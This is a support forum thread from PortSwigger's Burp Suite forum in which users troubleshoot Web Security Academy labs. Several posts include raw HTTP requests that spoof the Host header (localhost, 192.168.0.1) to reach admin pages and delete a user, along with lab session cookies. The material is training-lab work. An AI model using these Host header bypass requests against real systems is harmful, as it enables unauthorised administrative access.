Research Academy
My account Customers About Blog Careers Legal Contact Resellers
The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

For support requests, go to the Support Center. To discuss with other Burp users, head to our Discord page.

SUPPORT CENTER DISCORD

Lab: Host header authentication bypass seems broken

Marie | Last updated: Mar 21, 2023 11:53AM UTC

After quite some trial and error and taking a look at the solution, it seems the lab is broken in its current state. Submitting the following request based on the solution will result in the server not responding and simply closing the connection: ```http GET /admin HTTP/2 Host: localhost Cookie: _lab=[REDACTED]; session=[REDACTED] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Te: trailers ``` or on the built-in Chrome browser: ```http GET /admin/delete?username=carlos HTTP/2 Host: localhost Cookie: _lab=[REDACTED]; _lab=[REDACTED]; session=[REDACTED] Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="111", "Not(A:Brand";v="8" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.5563.65 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 ``` Whether this is done via Firefox or the built-in Chrome browser does not matter, neither receive an answer. I have only once received a response when navigating to /admin, but when resending the unchanged request, it would not return a response anymore. This is being tried from a Kali VM with Burp Suite Professional at v2023.2.3.

Ben, PortSwigger Agent | Last updated: Mar 22, 2023 08:10AM UTC

Hi Marie, If you specifically change the Protocol value to HTTP/1 within the Request attributes section of the Inspector - do your Repeater requests now function and allow you to solve this lab?

kairosdev | Last updated: Mar 29, 2023 06:14PM UTC

I'm having some trouble too. When I send the request from repeater, like this one: GET /admin HTTP/1.1 Host: 192.168.0.1 Cookie: _lab=46%7cMCwCFHhVjvQ7odm5E9CjHajiwme91RbIAhQuRYX1dOrEreRwYiHPPD6%2f8sl79d%2f63ofjmj4X1jtVmbVOiNVuoe8w%2bC%2bzxTGbvBXntW7ghbxPnMGbzpX4RxvG2xNuQuofgPKWzq%2fUkPYHoC6Ss7VeTI3aWNZ2hcjfZCwGYIq257NM3RE%3d; session=UJIGvWmJ2QIzKRi8ktLhNCF0YfyasQmn Sec-Ch-Ua: "Not A(Brand";v="24", "Chromium";v="110" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Linux" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://0a200049041f33c6c2a754b6007f00cf.web-security-academy.net/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 I always receive this response: HTTP/1.1 301 Moved Permanently Location: https://0a200049041f33c6c2a754b6007f00cf.web-security-academy.net/ Connection: close Keep-Alive: timeout=10 Content-Length: 0 Any idea?

Ben, PortSwigger Agent | Last updated: Mar 30, 2023 08:24AM UTC

Hi Kairos, Just to clarify, this is in relation to the same lab that the user in the opening post was having issues with (the 'Host header authentication bypass' lab)?

kairosdev | Last updated: Mar 30, 2023 08:41AM UTC

I don't know. I'm referring to "Host validation bypass via connection state attack".

Ben, PortSwigger Agent | Last updated: Mar 30, 2023 10:42AM UTC